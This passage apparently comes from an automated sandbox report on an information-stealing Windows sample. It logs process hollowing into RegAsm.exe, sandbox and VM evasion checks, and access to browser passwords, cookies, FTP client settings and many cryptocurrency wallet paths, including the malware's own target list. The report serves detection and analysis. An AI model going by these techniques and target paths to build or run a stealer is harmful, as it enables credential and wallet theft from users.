                        Source: softokn3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.5.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.5.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.5.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.5.drStatic PE information: section name: .didat
                        Source: sqln[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.5.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C61CC push ecx; ret 0_2_003C61DF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004083A5 push ecx; ret 0_2_004083B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041A4E5 push ecx; ret 5_2_0041A4F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B536 push ecx; ret 5_2_6C82B549
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR
                        Source: file.exe, RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                        Source: file.exe, RegAsm.exeBinary or memory string: SBIEDLL.DLL
                        Source: file.exe, RegAsm.exeBinary or memory string: API_LOG.DLL
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h5_2_00410370
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D90D1 FindFirstFileExW,0_2_003D90D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,5_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,5_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,5_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,5_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410540 GetSystemInfo,wsprintfA,5_2_00410540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_5-59004
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_5-60085
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C67DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003C67DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DA24C mov eax, dword ptr fs:[00000030h]0_2_003DA24C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D0947 mov ecx, dword ptr fs:[00000030h]0_2_003D0947
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DC84B GetProcessHeap,0_2_003DC84B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C64D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003C64D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C67DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003C67DF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C693B SetUnhandledExceptionFilter,0_2_003C693B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CD209 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003CD209
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0041A68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041F768 SetUnhandledExceptionFilter,5_2_0041F768
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041BBB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C82B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C82B1F7

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042224D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_0042224D
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,5_2_00411BD0
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10A9008
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C62BC cpuid 0_2_003C62BC
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DC00D
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_003DC098
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003DC2EB
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003DC414
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003DC51A
                        Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_003DC5E9
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003D52B3
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003D57D9
                        Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_003DBC85
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DBF27
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DBF72
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,5_2_00410370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,5_2_004103E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C66D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003C66D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,5_2_00410220
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,5_2_00410300
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match File source: 0.2.file.exe.3eeac0.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3eeac0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Exodus Web3 Wallet
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
